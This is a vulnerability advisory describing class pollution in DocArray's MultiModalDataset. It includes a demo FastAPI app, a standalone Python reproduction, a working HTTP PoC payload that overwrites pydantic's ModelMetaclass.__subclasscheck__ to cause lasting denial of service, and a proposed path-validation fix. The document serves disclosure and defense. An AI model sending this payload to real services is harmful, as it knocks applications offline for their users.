DocArray's MultiModalDataset implements its preprocessing component insecurely. Its __getitem__ method performs no sanitization on the dotted object path it receives, so nothing prevents access to, or modification of, internal class objects. When multimodal dataset operations are exposed through a web API, such as the officially recommended FastAPI, bad actors can reach internal Python runtime class objects through double-underscore attributes (for example .__class__.__base__...) and overwrite them, which leads at minimum to a DoS attack. When combined with other backend code that enriches the Python runtime state, further attacks such as RCE and XSS remain possible, as our previous findings show (see related materials).
The __getitem__ method of the MultiModalDataset class resolves a Python object by walking the dotted path taken from the input, but it does not sanitize that path against unauthorized access to internal objects such as __class__.__base__:
# https://github.com/docarray/docarray/blob/f5fc0f6d5f3dcb0201dc735262ef3256bdf054b9/docarray/data/torch_dataset.py#L115-L128
def __getitem__(self, item: int):
    doc = self.docs[item].copy(deep=True)
    for field, preprocess in self._preprocessing.items():
        if len(field) == 0:
            doc = preprocess(doc) or doc
        else:
            acc_path = field.split('.')
            _field_ref = doc
            for attr in acc_path[:-1]:
                _field_ref = getattr(_field_ref, attr)
            attr = acc_path[-1]
            value = getattr(_field_ref, attr)
            setattr(_field_ref, attr, preprocess(value) or value)
    return doc
Imagine a scenario in which users are allowed to pass in a data path, such as thesis.title.text, and choose one preprocessing function to apply to it.
import torch
from docarray import DocList, BaseDoc
from docarray.data import MultiModalDataset
from docarray.documents import TextDoc
from docarray.base_doc import DocArrayResponse
from fastapi import FastAPI
from typing import Dict, List
import uvicorn
class Thesis(BaseDoc):
    title: TextDoc
class Student(BaseDoc):
    thesis: Thesis
class ProcessingRequest(BaseDoc):
    """Request model that allows users to specify which preprocessing to apply and where."""
    student: Student
    preprocessing_paths: Dict[str, List[str]] = {}
# Define preprocessing functions
def embed_title(title: TextDoc):
    """Generate embeddings for the thesis title."""
    title.embedding = torch.ones(4)
def normalize_embedding(thesis: Thesis):
    """Normalize the thesis title embeddings."""
    if hasattr(thesis.title, 'embedding') and thesis.title.embedding is not None:
        thesis.title.embedding = thesis.title.embedding / thesis.title.embedding.norm()
def prepend_number(text: str):
    """Prepend 'Number ' to the title text."""
    return f"Number {text}"
# Map of available processing functions
AVAILABLE_PROCESSORS = {
    "embed_title": embed_title,
    "normalize_embedding": normalize_embedding,
    "prepend_number": prepend_number
}
# Create FastAPI app
app = FastAPI(title="Thesis Processing API")
@app.post("/process_thesis/", response_model=Student, response_class=DocArrayResponse)
async def process_thesis(request: ProcessingRequest) -> Student:
    """
    Process a student's thesis using MultiModalDataset with user-specified preprocessing paths.
    Example request:
    {
        "student": {
            "thesis": {
                "title": {
                    "text": "5"
                }
            }
        },
        "preprocessing_paths": {
            "thesis.title.text": ["prepend_number"]
        }
    }
    """
    # Build preprocessing config based on user selections
    preprocessing_config = {}
    for path, processors in request.preprocessing_paths.items():
        for processor_name in processors:
            if processor_name in AVAILABLE_PROCESSORS:
                # Register the first processor selected for this path
                if path not in preprocessing_config:
                    preprocessing_config[path] = AVAILABLE_PROCESSORS[processor_name]
                else:
                    # We can't have multiple processors for the same path in MultiModalDataset
                    # This is a limitation of the library
                    return {"error": f"Multiple processors for path '{path}' are not supported"}
    # Create a dataset with just this one student
    single_doc = DocList[Student]([request.student])
    # Apply the selected preprocessing using MultiModalDataset
    if preprocessing_config:
        ds = MultiModalDataset[Student](
            single_doc,
            preprocessing=preprocessing_config,
        )
        # The user-controlled dotted paths are resolved here, inside __getitem__
        processed_student = ds[0]
    else:
        # No preprocessing selected
        processed_student = request.student
    return processed_student
if __name__ == "__main__":
    uvicorn.run(app, host="127.0.0.1", port=8001)
Bad actors can manipulate the dotted path so that it points to an internal object instead, such as thesis.__class__.__class__.__subclasscheck__. Overwriting that attribute changes the behavior of the builtin issubclass(cls, class_or_tuple) whenever a class built by the polluted metaclass is passed as class_or_tuple. For example, bad actors can overwrite thesis.__class__.__class__.__subclasscheck__ with any non-callable value, such as a tensor, a string, or an int. pydantic's ModelMetaclass is an exploitable case. When a FastAPI web app uses pydantic for its data models, instances of ModelMetaclass (the model classes) are always passed to issubclass() in its internal logic. Attackers can therefore use the dotted path to reach the ModelMetaclass class and then overwrite its __subclasscheck__ method with a non-callable value. After that, every request sent to a FastAPI endpoint that depends on a data model fails, because the method can no longer be called.
More dangerously, every DocArray document class, such as TextDoc, uses ModelMetaclass as its metaclass under the hood. Bad actors can therefore easily exploit the class pollution vulnerability in the MultiModalDataset class to pollute ModelMetaclass.__subclasscheck__ with payloads like XXX.__class__.__class__.__subclasscheck__ and reliably cause a DoS.
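The mechanism can be reproduced without DocArray or pydantic. The following is a minimal sketch, not library code: Meta and Doc are hypothetical stand-ins for ModelMetaclass and a document class, and apply_preprocessing is a hypothetical helper that copies the getattr/setattr walk from __getitem__. It shows that a legitimate path behaves as intended, while the malicious path replaces the metaclass's __subclasscheck__ with a string and breaks issubclass() for every class built by that metaclass.

```python
class Meta(type):
    """Hypothetical stand-in for pydantic's ModelMetaclass."""


class Doc(metaclass=Meta):
    """Hypothetical stand-in for a DocArray document class."""

    def __init__(self, text):
        self.text = text


def apply_preprocessing(doc, field, preprocess):
    """Copy of the unsanitized dotted-path walk used in __getitem__."""
    acc_path = field.split('.')
    ref = doc
    for attr in acc_path[:-1]:
        ref = getattr(ref, attr)
    attr = acc_path[-1]
    value = getattr(ref, attr)
    setattr(ref, attr, preprocess(value) or value)
    return doc


def prepend_number(value):
    return f"Number {value}"


doc = Doc("5")

# Intended use: the path stays inside the document's own data.
apply_preprocessing(doc, "text", prepend_number)
print(doc.text)  # Number 5

# issubclass() still works before the pollution.
print(issubclass(int, Doc))  # False

# Malicious use: doc -> Doc -> Meta, then Meta.__subclasscheck__ becomes a str.
apply_preprocessing(doc, "__class__.__class__.__subclasscheck__", prepend_number)

try:
    issubclass(int, Doc)
except TypeError as exc:
    # The hook on the metaclass is no longer callable.
    print("issubclass is broken:", exc)
```

The pollution lives on the metaclass itself, so it affects every class created by Meta for the remaining lifetime of the process, not only the instance that was passed in.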
PoC against the demo provided above: as the exploitation GIF shows, once the pollution has taken place, the endpoints that rely on pydantic models stay out of service until the Python runtime is restarted, which clears the polluted state.
POST /process_thesis/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 291

{
    "student": {
        "thesis": {
            "title": {
                "text": "5"
            }
        }
    },
    "preprocessing_paths": {
        "thesis.__class__.__class__.__subclasscheck__": ["prepend_number"]
    }
}
The __getitem__ method of MultiModalDataset should validate the dotted path and reject unauthorized access to internal attributes.
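One possible shape for such a check is sketched below. It is an illustration under stated assumptions, not the fix adopted upstream: validate_field_path is a hypothetical helper name, and the rule it applies (reject any path segment that is not a plain identifier or that starts with an underscore) is an assumed policy that may be stricter than a real patch needs to be.

```python
from typing import List


def validate_field_path(field: str) -> List[str]:
    """Split a dotted path and reject segments that could reach internals.

    Hypothetical helper: the underscore rule is an assumed policy,
    not DocArray's actual behavior.
    """
    if field == "":
        # An empty field means "apply to the whole document" in __getitem__.
        return []
    segments = field.split(".")
    for segment in segments:
        # Blocks dunder and private attributes, as well as empty or malformed segments.
        if not segment.isidentifier() or segment.startswith("_"):
            raise ValueError(
                f"Illegal attribute in preprocessing path: {segment!r}"
            )
    return segments


print(validate_field_path("thesis.title.text"))  # ['thesis', 'title', 'text']

try:
    validate_field_path("thesis.__class__.__class__.__subclasscheck__")
except ValueError as exc:
    print("rejected:", exc)
```

A stricter variant could additionally require every segment to be a declared field of the document model at that level, which would turn the check from a deny-list into an allow-list.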
For more information about class pollution please refer to:
